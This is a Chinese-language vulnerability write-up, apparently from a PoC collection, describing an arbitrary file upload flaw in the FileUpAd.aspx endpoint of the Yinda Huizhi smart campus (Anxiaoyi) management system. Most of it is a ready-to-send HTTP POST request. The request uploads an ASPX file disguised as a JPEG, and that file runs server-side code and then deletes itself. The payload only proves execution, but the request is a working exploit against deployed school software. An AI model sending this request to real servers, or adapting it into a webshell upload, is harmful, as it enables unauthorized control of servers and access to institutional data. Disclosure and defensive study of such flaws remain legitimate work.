漏洞描述
银达汇智智慧校园(安校易)管理系统的 FileUpAd.aspx 接口存在任意文件上传漏洞。攻击者可以通过发送特制的POST请求,利用该接口上传包含恶意代码的文件(例如ASPX文件),并在服务器上执行该文件。由于缺乏对上传文件类型和路径的有效验证,攻击者能够上传并执行任意代码,从而控制服务器或进行其他恶意操作。
银达汇智智慧校园(安校易)管理系统 FileUpAd.aspx 任意文件上传漏洞
PoC代码
POST /Module/FileUpPage/FileUpAd.aspx?file_tmid=bdkx HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 261
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycqjvycfx
Cookie: ASP.NET_SessionId=vzlx4yv4akq1pzpzzkeumwqg
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
------WebKitFormBoundarycqjvycfx
Content-Disposition: form-data; name="File1"; filename="bdkx.aspx"
Content-Type: image/jpeg
<%@Page Language="C#"%>
<%Response.Write(40350*43697);System.IO.File.Delete(Request.PhysicalPath);%>
------WebKitFormBoundarycqjvycfx--